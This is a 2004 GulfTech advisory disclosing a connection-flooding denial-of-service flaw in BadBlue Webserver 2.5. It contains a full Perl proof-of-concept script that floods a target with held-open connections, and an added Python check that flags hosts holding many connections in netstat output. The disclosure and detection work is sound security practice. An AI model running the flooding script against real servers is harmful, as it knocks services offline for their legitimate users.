##########################################################
# GulfTech Security Research             August, 18th 2004
##########################################################
# Vendor  : BadBlue
# URL     : http://www.badblue.com
# Version : BadBlue Webserver v2.5
# Risk    : Denial of Service
##########################################################

Description:
Share photos, videos, music, and business files with friends and colleagues instantly. Tired of paying a service to share your files (and the hassle of sending your files to their site)? BadBlue shares files directly from your own PC, using the cable/DSL/broadband/dialup connection you already paid for! BadBlue lets you run a no-hassle Web site on your own PC for free, including a domain name you can choose. Within seconds, you can transform your PC into a friendly, file sharing Web server with all the power of a real server on the Internet. Remote users can search for files, explore your shared folders, and run full-blown applications created in HTML, PHP, Perl, and so on.

Denial of Service:
BadBlue Webserver cannot handle multiple connections from the same host, and will deny all access to any users at right around twenty-four simultaneous connections. I have included a proof of concept that floods the target server with a number of connections, and then basically keeps those connections up for as long as you specify, thus blocking all other traffic to the affected server.

#!/usr/bin/perl
##############################################################
# BadBlue v2.52 Web Server - Multiple Connections DoS POC Code
##############################################################
# BadBlue Web Server can not handle many simultaneous connects
# from the same host, and will lock up until the connects stop
##############################################################
# This Proof Of Concept Written By GulfTech Security Research
##############################################################

use Strict;
use Socket;
use IO::Socket;

my $host = $ARGV[0];
my $port = $ARGV[1];
my $stop = $ARGV[2];
my $size = 1000;
my $prot = getprotobyname('tcp');
my $slep = $ARGV[3];

printf("================================================\n");
printf(" BadBlue v2.52 Web Server Denial Of Service POC \n");
printf("================================================\n");
printf("[*] Making %d Connections To %s \n", $stop , $host);

for ($i=1; $i<$stop; $i++)
{
    socket($i, PF_INET, SOCK_STREAM, $prot );
    my $dest = sockaddr_in ($port, inet_aton($host));
    connect($i, $dest);
}

CheckServer($host, $i, $slep, $stop);
KillThreads($stop);
printf("[*] Exploit Attempt Unsuccesful");
exit;

sub CheckServer($host, $i, $slep, $stop) {
    ($host, $i, $slep, $stop) = @_;
    $blank = "\015\012" x 2;
    $request = "GET / HTTP/1.0".$blank;
    $remote = IO::Socket::INET->new(
        Proto => "tcp",
        PeerAddr => $host,
        PeerPort => $port,
        Timeout => '10000',
        Type => SOCK_STREAM,
    );
    print $remote $request;
    unless ( <$remote> )
    {
        printf("[*] Host %s Has Been Successfully DoS'ed\n", $host);
        printf("[*] The Host Will Be Down For %d Seconds\n", $slep);
        sleep($slep);
        KillThreads($stop);
        exit;
    }
}

sub KillThreads($stop) {
    $stop = @_;
    printf("[*] Killing All active Connections");
    for ($l=1; $l<$stop; $l++)
    {
        shutdown($l,2)|| die("Couldn't Shut Down Socket");
        $l++;
    }
}

Solution:
The development team has been contacted and said they will be looking into this issue shortly. Users are advised to upgrade as soon as possible.

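
A defensive check for the condition described above, as an added example that is not part of the original advisory: it counts ESTABLISHED connections per remote address in `netstat -an` output and flags any peer approaching the roughly twenty-four simultaneous connections at which the advisory says BadBlue stops serving. The port (80), the alert threshold (20) and the sample snapshot are assumptions constructed for illustration.

```python
# Flag peers holding many simultaneous connections to a web server port.
# Input is `netstat -an` text (Windows column layout); the sample is constructed.
from collections import Counter

SERVER_PORT = 80        # assumption: port the web server listens on
ALERT_THRESHOLD = 20    # assumption: alert below the ~24 the advisory reports

def split_endpoint(endpoint):
    """Split 'addr:port' on the last colon so bracketed IPv6 also works."""
    addr, _, port = endpoint.rpartition(":")
    return addr.strip("[]"), port

def count_peers(netstat_text, server_port=SERVER_PORT):
    """Return Counter {remote_ip: ESTABLISHED connections to server_port}."""
    peers = Counter()
    for line in netstat_text.splitlines():
        fields = line.split()
        # Data rows look like: TCP <local> <foreign> <state>
        if len(fields) != 4 or fields[0] != "TCP" or fields[3] != "ESTABLISHED":
            continue
        _, local_port = split_endpoint(fields[1])
        remote_ip, _ = split_endpoint(fields[2])
        if local_port == str(server_port):
            peers[remote_ip] += 1
    return peers

def flag_peers(netstat_text, threshold=ALERT_THRESHOLD, server_port=SERVER_PORT):
    """Return [(remote_ip, count)] for peers at or above threshold, busiest first."""
    counts = count_peers(netstat_text, server_port)
    return [(ip, n) for ip, n in counts.most_common() if n >= threshold]

def build_sample():
    """Constructed snapshot: one peer with 23 connections, two ordinary clients."""
    rows = ["Active Connections", "",
            "  Proto  Local Address          Foreign Address        State",
            "  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING"]
    rows += [f"  TCP    192.0.2.10:80          203.0.113.7:{50000 + i}      ESTABLISHED"
             for i in range(23)]
    rows += ["  TCP    192.0.2.10:80          198.51.100.4:51234     ESTABLISHED",
             "  TCP    192.0.2.10:80          198.51.100.9:51300     TIME_WAIT",
             "  TCP    192.0.2.10:3389        203.0.113.7:60000      ESTABLISHED"]
    return "\n".join(rows)

if __name__ == "__main__":
    for ip, n in flag_peers(build_sample()):
        print(f"ALERT {ip} holds {n} connections to port {SERVER_PORT}")
```

Run against periodic snapshots, a peer that stays flagged across several intervals is holding connections open rather than browsing normally.
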
Related Info:
The original advisory can be found at the following location
http://www.gulftech.org/?node=research&article_id=00042-08202004

Credits:
James Bercegay of the GulfTech Security Research Team